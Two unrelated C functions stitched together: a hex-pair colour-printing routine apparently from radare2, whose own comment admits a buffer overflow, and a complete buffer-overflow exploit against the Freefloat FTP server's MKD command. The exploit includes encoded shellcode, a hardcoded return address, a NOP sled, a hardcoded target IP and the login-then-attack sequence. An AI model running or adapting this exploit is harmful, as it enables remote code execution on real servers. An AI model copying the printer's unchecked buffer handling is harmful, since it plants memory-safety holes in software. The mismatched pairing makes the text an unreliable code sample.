// XXX: redesign ? :) R_API char *r_print_hexpair(RPrint *p, const char *str, int n) { const char *s, *lastcol = Color_WHITE; char *d, *dst = (char *)malloc ((strlen (str)+2)*32); int colors = p->flags & R_PRINT_FLAGS_COLOR; /* XXX That's hacky as shit.. but partially works O:) */ /* TODO: Use r_print_set_cursor for win support */ int cur = R_MIN (p->cur, p->ocur); int ocur = R_MAX (p->cur, p->ocur); int ch, i; if (p->cur_enabled && cur==-1) cur = ocur; ocur++; #if CURDBG sprintf (dst, "(%d/%d/%d/%d)", p->cur_enabled, cur, ocur, n); d = dst+ strlen(dst); #else d = dst; #endif // XXX: overflow here // TODO: Use r_cons primitives here #define memcat(x,y) { memcpy(x,y,strlen(y));x+=strlen(y); } //for (s=str, d=dst; *s; s+=2, d+=2, i++) { for (s=str, i=0 ; *s; s+=2, d+=2, i++) { if (p->cur_enabled) { if (i==ocur-n) //memcat (d, "\x1b[27;47;30m"); //memcat (d, "\x1b[0m");//27;47;30m"); memcat (d, "\x1b[0m"); memcat (d, lastcol); if (i>=cur-n && i<ocur-n) memcat (d, "\x1b[7m"); } if (colors) { if (s[0]=='0' && s[1]=='0') lastcol = Color_GREEN; else if (s[0]=='7' && s[1]=='f') lastcol = Color_YELLOW; else if (s[0]=='f' && s[1]=='f') lastcol = Color_RED; else { ch = r_hex_pair2bin(s); //sscanf (s, "%02x", &ch); // XXX can be optimized if (IS_PRINTABLE (ch)) lastcol = Color_MAGENTA; } memcat (d, lastcol); } memcpy (d, s, 2); } if (colors || p->cur_enabled) memcpy (d, Color_RESET, strlen (Color_RESET)+1); else *d = 0; return dst; }
void *freefloat_ftp_server_mkd_exploit(struct module_t *module) { struct module_t *self; int sock_fd; char buffer[1024]; char attack_string[1006]; char *sc; int space; int offset; char *junk; char *nops; offset = 0; space = 0; self = module; print_error("self.offset = %d", self->target.offset); memset(&buffer, 0, 1024); /* Hard coded until i get a good options method setup */ sock_fd = tcp_socket_connect("10.69.69.208", "21", buffer, 1024); memset(&attack_string, '\x90', 1006); sc = "\xba\x46\x14\xf5\x8a\xda\xc8\xd9\x74\x24\xf4\x5e\x2b\xc9" "\xb1\x33\x83\xee\xfc\x31\x56\x0e\x03\x10\x1a\x17\x7f\x60" "\xca\x5e\x80\x98\x0b\x01\x08\x7d\x3a\x13\x6e\xf6\x6f\xa3" "\xe4\x5a\x9c\x48\xa8\x4e\x17\x3c\x65\x61\x90\x8b\x53\x4c" "\x21\x3a\x5c\x02\xe1\x5c\x20\x58\x36\xbf\x19\x93\x4b\xbe" "\x5e\xc9\xa4\x92\x37\x86\x17\x03\x33\xda\xab\x22\x93\x51" "\x93\x5c\x96\xa5\x60\xd7\x99\xf5\xd9\x6c\xd1\xed\x52\x2a" "\xc2\x0c\xb6\x28\x3e\x47\xb3\x9b\xb4\x56\x15\xd2\x35\x69" "\x59\xb9\x0b\x46\x54\xc3\x4c\x60\x87\xb6\xa6\x93\x3a\xc1" "\x7c\xee\xe0\x44\x61\x48\x62\xfe\x41\x69\xa7\x99\x02\x65" "\x0c\xed\x4d\x69\x93\x22\xe6\x95\x18\xc5\x29\x1c\x5a\xe2" "\xed\x45\x38\x8b\xb4\x23\xef\xb4\xa7\x8b\x50\x11\xa3\x39" "\x84\x23\xee\x57\x5b\xa1\x94\x1e\x5b\xb9\x96\x30\x34\x88" "\x1d\xdf\x43\x15\xf4\xa4\xbc\x5f\x55\x8c\x54\x06\x0f\x8d" "\x38\xb9\xe5\xd1\x44\x3a\x0c\xa9\xb2\x22\x65\xac\xff\xe4" "\x95\xdc\x90\x80\x99\x73\x90\x80\xf9\x12\x02\x48\xd0\xb1" "\xa2\xeb\x2c"; /* Total size - addrlen - offset - payload_len - 'MKD ' - 2 for \r\n*/ space = (1006 - 4 - 247 - strlen(sc) - 4 - 2); junk = make_buff('A', 247); nops = make_buff('\x90', space); memcat(attack_string, 1006, &offset, "MKD ", 4); memcat(attack_string, 1006, &offset, junk, 247); memcat(attack_string, 1006, &offset, "\xEF\x31\x9D\x7C", 4); memcat(attack_string, 1006, &offset, nops, space); memcat(attack_string, 1006, &offset, sc, strlen(sc)); memcat(attack_string, 1006, &offset, "\r\n", 2); tcp_send_recv(sock_fd, "USER wtf\r\n", 11, buffer, 1024); tcp_send_recv(sock_fd, "PASS wtf\r\n", 11, buffer, 1024); tcp_send_recv(sock_fd, attack_string, 1006, buffer, 1024); free(junk); free(nops); return 0; }